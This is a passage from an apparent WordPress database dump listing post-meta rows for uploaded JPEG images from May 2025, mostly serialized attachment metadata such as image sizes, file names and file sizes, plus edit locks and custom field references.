}}'),
(3296,1219,'_wp_attached_file','2025/05/492395533_122151342884511674_5518396333285192230_n.jpg'),
(3297,1221,'_wp_attached_file','2025/05/492575902_122151342824511674_3073344397673799104_n.jpg'),
(3298,1220,'_wp_attached_file','2025/05/492867737_122151342668511674_2044248599372287971_n.jpg'),
(3299,1219,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492395533_122151342884511674_5518396333285192230_n.jpg\";s:8:\"filesize\";i:438714;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492395533_122151342884511674_5518396333285192230_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20145;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492395533_122151342884511674_5518396333285192230_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136493;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492395533_122151342884511674_5518396333285192230_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8324;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492395533_122151342884511674_5518396333285192230_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88456;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492395533_122151342884511674_5518396333285192230_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:249437;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492395533_122151342884511674_5518396333285192230_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20950;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3300,1220,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492867737_122151342668511674_2044248599372287971_n.jpg\";s:8:\"filesize\";i:422726;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492867737_122151342668511674_2044248599372287971_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19746;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492867737_122151342668511674_2044248599372287971_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132100;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492867737_122151342668511674_2044248599372287971_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8284;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492867737_122151342668511674_2044248599372287971_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85961;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492867737_122151342668511674_2044248599372287971_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:241242;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492867737_122151342668511674_2044248599372287971_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20968;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3301,1221,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492575902_122151342824511674_3073344397673799104_n.jpg\";s:8:\"filesize\";i:464959;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492575902_122151342824511674_3073344397673799104_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20461;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492575902_122151342824511674_3073344397673799104_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139460;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492575902_122151342824511674_3073344397673799104_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8687;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492575902_122151342824511674_3073344397673799104_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91399;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492575902_122151342824511674_3073344397673799104_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:260448;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492575902_122151342824511674_3073344397673799104_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3303,1217,'_thumbnail_id','1221'),
(3304,1217,'_edit_last','1'),
(3306,1217,'title_style','default'),
(3307,1217,'_title_style','field_5d1a0217cf408'),
(3308,1217,'related',''),
(3309,1217,'_related','field_603b51c3e183e'),
(3310,1222,'title_style','default'),
(3311,1222,'_title_style','field_5d1a0217cf408'),
(3312,1222,'related',''),
(3313,1222,'_related','field_603b51c3e183e'),
(3314,1223,'_edit_lock','1747278087:1'),
(3315,1225,'_wp_attached_file','2025/05/492153224_122150985776511674_8127100753024819994_n.jpg'),
(3316,1224,'_wp_attached_file','2025/05/491929256_122150985566511674_1213237821774674225_n.jpg'),
(3317,1226,'_wp_attached_file','2025/05/492027961_122150985494511674_7229230026640867612_n.jpg'),
(3318,1227,'_wp_attached_file','2025/05/492064201_122150985728511674_95307321235512140_n.jpg'),
(3319,1225,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492153224_122150985776511674_8127100753024819994_n.jpg\";s:8:\"filesize\";i:432249;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492153224_122150985776511674_8127100753024819994_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19784;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492153224_122150985776511674_8127100753024819994_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133510;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492153224_122150985776511674_8127100753024819994_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8324;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492153224_122150985776511674_8127100753024819994_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87193;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492153224_122150985776511674_8127100753024819994_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:245284;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492153224_122150985776511674_8127100753024819994_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20991;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3320,1228,'_wp_attached_file','2025/05/492007580_122150985614511674_8101341862677661150_n.jpg'),
(3321,1226,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492027961_122150985494511674_7229230026640867612_n.jpg\";s:8:\"filesize\";i:446937;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492027961_122150985494511674_7229230026640867612_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20247;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492027961_122150985494511674_7229230026640867612_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139542;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492027961_122150985494511674_7229230026640867612_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8429;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492027961_122150985494511674_7229230026640867612_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90950;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492027961_122150985494511674_7229230026640867612_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:256140;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492027961_122150985494511674_7229230026640867612_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21775;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3322,1224,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/491929256_122150985566511674_1213237821774674225_n.jpg\";s:8:\"filesize\";i:451752;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"491929256_122150985566511674_1213237821774674225_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20373;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"491929256_122150985566511674_1213237821774674225_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140526;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"491929256_122150985566511674_1213237821774674225_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8599;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"491929256_122150985566511674_1213237821774674225_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91271;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"491929256_122150985566511674_1213237821774674225_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:255812;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"491929256_122150985566511674_1213237821774674225_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21791;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3323,1227,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:60:\"2025/05/492064201_122150985728511674_95307321235512140_n.jpg\";s:8:\"filesize\";i:437054;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"492064201_122150985728511674_95307321235512140_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20054;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"492064201_122150985728511674_95307321235512140_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134958;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"492064201_122150985728511674_95307321235512140_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8376;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"492064201_122150985728511674_95307321235512140_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88157;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:62:\"492064201_122150985728511674_95307321235512140_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247877;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"492064201_122150985728511674_95307321235512140_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3324,1228,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1748;s:6:\"height\";i:1240;s:4:\"file\";s:62:\"2025/05/492007580_122150985614511674_8101341862677661150_n.jpg\";s:8:\"filesize\";i:431887;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"492007580_122150985614511674_8101341862677661150_n-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19987;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"492007580_122150985614511674_8101341862677661150_n-1024x726.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:726;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:134687;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"492007580_122150985614511674_8101341862677661150_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8350;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"492007580_122150985614511674_8101341862677661150_n-768x545.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88107;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:64:\"492007580_122150985614511674_8101341862677661150_n-1536x1090.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1090;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:246681;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"492007580_122150985614511674_8101341862677661150_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21181;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3326,1223,'_thumbnail_id','1224'),
(3327,1223,'_edit_last','1'),
(3329,1223,'title_style','default'),
(3330,1223,'_title_style','field_5d1a0217cf408'),
(3331,1229,'title_style','default'),
(3332,1229,'_title_style','field_5d1a0217cf408'),
(3333,1223,'related',''),
(3334,1223,'_related','field_603b51c3e183e'),
(3335,1229,'related',''),
(3336,1229,'_related','field_603b51c3e183e'),
(3337,1230,'_edit_lock','1747380209:1'),
(3338,1232,'_wp_attached_file','2025/05/S__8544316_0.jpg'),
(3339,1231,'_wp_attached_file','2025/05/S__8544313_0.jpg'),
(3340,1233,'_wp_attached_file','2025/05/S__8544311_0.jpg'),
(3341,1235,'_wp_attached_file','2025/05/S__8544306_0.jpg'),
(3342,1234,'_wp_attached_file','2025/05/S__8544310_0.jpg'),
(3343,1234,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544310_0.jpg\";s:8:\"filesize\";i:516603;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544310_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23658;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544310_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186227;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544310_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8886;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544310_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116574;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544310_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22641;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3344,1231,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544313_0.jpg\";s:8:\"filesize\";i:529744;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544313_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25591;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544313_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197311;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544313_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9951;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544313_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125447;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544313_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25551;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3345,1232,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544316_0.jpg\";s:8:\"filesize\";i:563215;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544316_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24604;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544316_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207817;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544316_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9271;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544316_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130261;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544316_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26181;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3346,1233,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544311_0.jpg\";s:8:\"filesize\";i:668375;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544311_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26033;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544311_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:235321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544311_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9430;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544311_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144695;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544311_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25913;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(3347,1235,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:24:\"2025/05/S__8544306_0.jpg\";s:8:\"filesize\";i:553653;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"S__8544306_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27117;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"S__8544306_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:214188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544306_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10172;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"S__8544306_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137236;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:24:\"S__8544306_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\